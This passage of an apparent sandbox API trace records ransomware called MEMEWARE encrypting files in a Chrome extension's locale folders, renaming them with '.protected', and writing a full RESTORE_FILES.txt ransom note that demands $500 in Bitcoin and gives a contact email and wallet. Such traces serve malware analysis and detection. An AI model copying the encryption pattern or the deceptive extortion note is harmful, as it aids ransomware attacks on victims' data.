2018") returned 177 [0083.359] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.359] CloseHandle (hObject=0x164) returned 1 [0083.359] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.359] lstrcmpiW (lpString1="ar", lpString2="Windows") returned -1 [0083.359] lstrcmpiW (lpString1="ar", lpString2="Program Files") returned -1 [0083.359] lstrcmpiW (lpString1="ar", lpString2="Program Files (x86)") returned -1 [0083.360] lstrcmpiW (lpString1="ar", lpString2="$Recycle.bin") returned 1 [0083.360] lstrcmpiW (lpString1="ar", lpString2="System Volume Information") returned -1 [0083.360] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar") returned 150 [0083.360] lstrcmpW (lpString1="ar", lpString2=".") returned 1 [0083.360] lstrcmpW (lpString1="ar", lpString2="..") returned 1 [0083.360] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\*") returned 152 [0083.360] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.360] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.360] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.360] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.360] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.360] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.360] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\.") returned 152 [0083.360] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.360] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.360] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.360] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.360] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.360] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.360] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.360] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\..") returned 153 [0083.360] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.360] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.360] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.360] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.361] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.361] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.361] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.361] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.361] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json") returned 164 [0083.361] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.361] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.361] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.361] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json") returned 164 [0083.362] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json") returned 164 [0083.362] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json") returned 164 [0083.362] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.362] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.364] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.364] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.364] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.364] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.364] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.365] CloseHandle (hObject=0x168) returned 1 [0083.365] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.protected") returned 174 [0083.365] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.protected")) returned 1 [0083.366] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.366] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.366] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\RESTORE_FILES.txt") returned 168 [0083.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.366] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.366] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.367] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.367] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.367] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.367] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.367] CloseHandle (hObject=0x164) returned 1 [0083.368] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.368] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0083.368] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0083.368] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0083.368] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0083.368] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0083.368] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg") returned 150 [0083.368] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0083.368] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0083.368] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\*") returned 152 [0083.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.368] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.368] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.368] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.368] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.368] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.368] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\.") returned 152 [0083.368] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.368] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.368] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.368] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.368] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.368] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.368] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.368] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\..") returned 153 [0083.369] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.369] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.369] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.369] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.369] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.369] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.369] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.369] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.369] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json") returned 164 [0083.369] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.369] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.369] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.369] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json") returned 164 [0083.370] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json") returned 164 [0083.370] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json") returned 164 [0083.370] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.370] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.372] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.372] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.372] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.372] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.373] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.373] CloseHandle (hObject=0x168) returned 1 [0083.373] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.protected") returned 174 [0083.373] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.protected")) returned 1 [0083.374] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.374] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.374] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\RESTORE_FILES.txt") returned 168 [0083.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.374] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.374] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.375] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.375] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.375] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 